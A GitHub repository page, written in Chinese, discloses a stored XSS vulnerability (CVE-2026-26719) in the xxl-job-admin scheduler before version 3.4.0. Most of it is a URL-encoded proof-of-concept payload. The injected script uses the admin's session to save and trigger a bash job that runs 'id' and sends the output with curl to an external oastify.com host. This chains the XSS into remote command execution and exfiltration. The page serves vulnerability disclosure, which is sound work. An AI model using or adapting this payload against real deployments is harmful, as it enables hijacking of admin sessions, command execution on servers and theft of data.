Ibrahim-Sartawi/CVE-2026-26719

GitHub: Ibrahim-Sartawi/CVE-2026-26719

该项目披露并验证了 xxl-job-admin 任务调度中心 JobInfoController 中 addressList 参数的存储型 XSS 漏洞(CVE-2026-26719),影响 3.4.0 以下版本。

Stars: 0 | Forks: 0

## 描述 # 摘要 xxl-job-admin 的 JobInfoController.java 中存在一个存储型跨站脚本攻击(XSS)漏洞,其 addressList 参数会接收未经处理的 URL 编码 JavaScript。该 payload 被存储后,随后会在用户的浏览器中执行,从而导致未授权操作。 # 受影响产品 ``` xxl-job < 3.4.0 ``` # 影响 xxl-job-admin < v.3.4.0 中的跨站脚本攻击漏洞允许远程攻击者通过包含恶意脚本的特制 HTTP GET 请求执行任意代码。 # 概念验证 https://github.com/user-attachments/assets/01d7d767-ae1d-4a71-9bab-fcf76e01525d # Payload ``` /jobinfo/trigger?id=294&executorParam=test&addressList=%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%2f%77%61%6c%6c%79%74%2d%6a%6f%62%2d%61%64%6d%69%6e%2f%6a%6f%62%63%6f%64%65%2f%73%61%76%65%3f%69%64%3d%32%39%34%26%67%6c%75%65%53%6f%75%72%63%65%3d%25%32%33%21%25%32%46%62%69%6e%25%32%46%62%61%73%68%25%30%41%69%64%2b%25%37%43%2b%63%75%72%6c%2b%2d%64%2b%25%34%30%2d%2b%68%74%74%70%25%33%41%25%32%46%25%32%46%71%69%63%38%62%72%36%64%36%6f%6d%32%6a%34%35%39%7a%6b%34%65%76%75%69%6d%6c%64%72%34%66%30%33%70%2e%6f%61%73%74%69%66%79%2e%63%6f%6d%2b%25%30%41%65%78%69%74%2b%30%25%30%41%26%67%6c%75%65%52%65%6d%61%72%6b%3d%31%32%33%34%35%27%2c%20%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%3c%2f%73%63%72%69%70%74%3e%0a%3c%73%63%72%69%70%74%3e%66%65%74%63%68%28%27%2f%77%61%6c%6c%79%74%2d%6a%6f%62%2d%61%64%6d%69%6e%2f%6a%6f%62%69%6e%66%6f%2f%74%72%69%67%67%65%72%3f%69%64%3d%32%39%34%26%65%78%65%63%75%74%6f%72%50%61%72%61%6d%3d%74%65%73%74%26%61%64%64%72%65%73%73%4c%69%73%74%3d%27%2c%7b%6d%65%74%68%6f%64%3a%20%27%47%45%54%27%2c%63%72%65%64%65%6e%74%69%61%6c%73%3a%20%27%69%6e%63%6c%75%64%65%27%7d%29%3c%2f%73%63%72%69%70%74%3e://localhost:8090 ``` 致谢 Ibrahim Sartawi
标签:JS文件枚举, Web安全, XXL-JOB, 安全漏洞, 数据可视化, 漏洞披露, 自动化分析, 蓝队分析, 跨站脚本